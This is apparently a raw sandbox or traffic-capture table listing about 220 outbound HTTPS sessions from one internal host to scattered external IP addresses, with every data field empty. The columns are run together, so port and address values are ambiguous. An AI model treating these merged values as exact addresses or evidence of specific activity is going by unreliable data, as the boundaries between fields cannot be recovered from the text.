                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11764192.168.2.2352084221.182.181.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11765192.168.2.2336344201.53.137.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11766192.168.2.2340488174.198.68.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11767192.168.2.233748086.108.147.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11768192.168.2.2358406144.70.37.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11769192.168.2.234278032.102.92.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11770192.168.2.235483285.5.98.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11771192.168.2.23385801.242.39.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11772192.168.2.234244262.176.209.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11773192.168.2.2338504179.13.254.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11774192.168.2.234798214.75.31.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11775192.168.2.23504089.73.143.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11776192.168.2.2360866197.69.125.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11777192.168.2.2335978218.64.10.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11778192.168.2.235246482.87.123.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11779192.168.2.2357214193.36.5.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11780192.168.2.235725692.252.234.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11781192.168.2.2357688190.49.14.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11782192.168.2.2353608172.238.180.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11783192.168.2.235448852.147.187.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11784192.168.2.235624854.231.151.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11785192.168.2.234088412.182.238.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11786192.168.2.235898086.98.81.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11787192.168.2.2341698116.102.161.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11788192.168.2.2345958139.163.109.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11789192.168.2.2342396151.68.132.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11790192.168.2.2356268150.192.159.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11791192.168.2.2338198141.108.32.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11792192.168.2.234686087.115.236.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11793192.168.2.2357722130.192.249.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11794192.168.2.2354724107.221.63.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11795192.168.2.2334864174.53.208.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11796192.168.2.2347726109.180.224.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11797192.168.2.234102623.246.155.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11798192.168.2.2333706204.9.11.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11799192.168.2.234776087.68.223.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11800192.168.2.234437459.211.70.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11801192.168.2.2345760211.134.24.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11802192.168.2.233653281.248.240.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11803192.168.2.2350078193.207.235.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11804192.168.2.2355216210.135.190.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11805192.168.2.234898627.164.15.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11806192.168.2.2352550107.51.7.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11807192.168.2.2358064173.84.188.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11808192.168.2.235287862.99.52.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11809192.168.2.2332910189.103.98.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11810192.168.2.2344546194.190.31.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11811192.168.2.233431843.206.102.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11812192.168.2.235904031.185.164.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11813192.168.2.234580469.119.138.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11814192.168.2.2335198148.214.219.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11815192.168.2.2335668223.99.94.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11816192.168.2.23383524.15.153.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11817192.168.2.235750653.86.34.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11818192.168.2.2357064189.182.171.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11819192.168.2.233710625.189.100.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11820192.168.2.2344156211.9.125.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11821192.168.2.235799484.54.6.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11822192.168.2.234067874.70.151.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11823192.168.2.2333778155.87.122.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11824192.168.2.23435965.55.113.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11825192.168.2.233910093.146.105.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11826192.168.2.2358006220.87.78.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11827192.168.2.234026698.80.13.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11828192.168.2.234357080.217.123.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11829192.168.2.234994471.170.227.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11830192.168.2.2343152161.161.48.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11831192.168.2.2350656126.92.182.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11832192.168.2.2344550135.45.189.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11833192.168.2.235087471.4.230.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11834192.168.2.235132490.21.215.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11835192.168.2.234368693.90.181.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11836192.168.2.2354676155.86.245.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11837192.168.2.2355268209.186.7.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11838192.168.2.2334876175.178.170.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11839192.168.2.235036057.90.129.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11840192.168.2.2350012199.106.227.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11841192.168.2.235965042.92.65.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11842192.168.2.234521278.6.255.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11843192.168.2.2349270133.20.53.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11844192.168.2.2340392200.125.118.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11845192.168.2.2353744113.121.164.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11846192.168.2.2360908186.79.150.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11847192.168.2.235548413.29.49.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11848192.168.2.234621236.65.43.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11849192.168.2.2355320170.177.39.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11850192.168.2.234331690.153.80.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11851192.168.2.2343484196.49.111.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11852192.168.2.2352670132.158.243.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11853192.168.2.2333732187.91.146.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11854192.168.2.23570668.108.185.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11855192.168.2.234070613.24.17.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11856192.168.2.2355258114.194.25.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11857192.168.2.235707440.124.107.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11858192.168.2.2341142108.58.71.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11859192.168.2.2350780123.225.85.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11860192.168.2.2346260151.168.19.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11861192.168.2.2352664189.191.33.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11862192.168.2.2343556108.200.51.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11863192.168.2.2346260170.228.205.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11864192.168.2.234477214.84.165.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11865192.168.2.2358802154.15.52.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11866192.168.2.235062859.56.96.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11867192.168.2.2355470120.120.154.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11868192.168.2.235885846.251.189.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11869192.168.2.23450888.248.135.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11870192.168.2.234644659.143.156.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11871192.168.2.234803284.125.68.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11872192.168.2.2333788186.213.151.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11873192.168.2.2347600131.105.163.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11874192.168.2.2345942107.251.155.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11875192.168.2.2345684117.242.108.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11876192.168.2.2352374134.186.20.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11877192.168.2.2357782102.121.219.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11878192.168.2.236016250.185.160.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11879192.168.2.234918253.229.47.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11880192.168.2.2355112133.78.31.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11881192.168.2.2340620202.129.126.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11882192.168.2.233977240.115.198.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11883192.168.2.235511659.78.161.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11884192.168.2.2360730107.170.97.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11885192.168.2.235883695.205.222.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11886192.168.2.2356672171.85.206.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11887192.168.2.234146225.111.206.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11888192.168.2.2337122160.94.165.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11889192.168.2.235458859.69.72.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11890192.168.2.2351938180.55.100.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11891192.168.2.2344894108.64.128.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11892192.168.2.235279692.170.3.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11893192.168.2.235896836.105.178.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11894192.168.2.2339360144.74.111.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11895192.168.2.2346326206.247.125.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11896192.168.2.2343714181.120.142.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11897192.168.2.2359136105.217.237.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11898192.168.2.234127023.138.139.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11899192.168.2.2339452113.139.132.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11900192.168.2.2332918181.100.20.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11901192.168.2.233444093.184.138.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11902192.168.2.234112863.99.235.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11903192.168.2.235676652.158.72.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11904192.168.2.2341256220.241.191.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11905192.168.2.235235886.193.20.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11906192.168.2.2348078221.57.15.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11907192.168.2.2335120101.205.136.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11908192.168.2.23567809.69.34.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11909192.168.2.2360446104.166.107.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11910192.168.2.234592662.136.201.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11911192.168.2.2335162149.204.223.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11912192.168.2.233715497.86.184.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11913192.168.2.235664481.51.19.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11914192.168.2.235065473.141.181.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11915192.168.2.2356306148.235.196.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11916192.168.2.233368264.234.42.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11917192.168.2.2334586171.38.112.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11918192.168.2.2343448156.184.190.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11919192.168.2.236036453.92.128.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11920192.168.2.2337672176.40.147.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11921192.168.2.2340692186.179.216.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11922192.168.2.235169064.35.154.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11923192.168.2.2333730156.168.145.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11924192.168.2.2354124170.226.253.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11925192.168.2.2338776148.120.193.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11926192.168.2.234490475.97.100.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11927192.168.2.234926072.199.31.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11928192.168.2.2340884142.71.158.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11929192.168.2.2356302128.156.250.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11930192.168.2.233811076.193.9.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11931192.168.2.235197024.150.18.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11932192.168.2.2334744203.61.211.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11933192.168.2.234706866.84.10.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11934192.168.2.2341526191.250.42.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11935192.168.2.235491046.126.238.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11936192.168.2.2333638133.29.198.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11937192.168.2.235568499.22.188.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11938192.168.2.2344732212.192.33.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11939192.168.2.2353808189.47.236.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11940192.168.2.234352894.244.235.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11941192.168.2.2342116114.180.211.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11942192.168.2.234227485.91.198.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11943192.168.2.235327888.170.7.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11944192.168.2.2341708158.107.12.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11945192.168.2.233701413.132.253.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11946192.168.2.2337620102.164.50.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11947192.168.2.23487461.141.163.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11948192.168.2.235338818.254.147.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11949192.168.2.2346018120.21.6.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11950192.168.2.236038042.117.191.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11951192.168.2.2358286168.148.197.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11952192.168.2.2341116130.80.75.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11953192.168.2.2333092182.146.221.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11954192.168.2.2336512184.68.196.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11955192.168.2.2352124204.129.189.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11956192.168.2.235779437.94.210.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11957192.168.2.2336710174.178.146.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11958192.168.2.2353312176.44.41.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11959192.168.2.2334374154.230.242.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11960192.168.2.2360262160.82.155.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11961192.168.2.234321634.97.230.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11962192.168.2.233285439.130.109.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11963192.168.2.2334242165.124.33.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11964192.168.2.235424438.194.63.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11965192.168.2.235471665.166.206.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11966192.168.2.2344464100.35.57.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11967192.168.2.2355732204.225.181.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11968192.168.2.234150883.10.179.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11969192.168.2.235982857.87.240.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11970192.168.2.2340834152.47.1.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11971192.168.2.2351522149.226.17.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11972192.168.2.234860619.110.177.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11973192.168.2.2349170208.147.32.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11974192.168.2.2356020155.170.123.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11975192.168.2.234794093.193.96.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11976192.168.2.2359110200.47.192.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11977192.168.2.2351444149.0.19.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11978192.168.2.2343524130.228.114.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11979192.168.2.235708844.8.164.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11980192.168.2.2354852194.8.249.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11981192.168.2.234958471.67.101.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11982192.168.2.2346350181.31.223.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11983192.168.2.234418652.172.16.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11984192.168.2.233662447.250.33.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          11985192.168.2.234183812.121.169.233443
                                          TimestampBytes transferredDirectionData


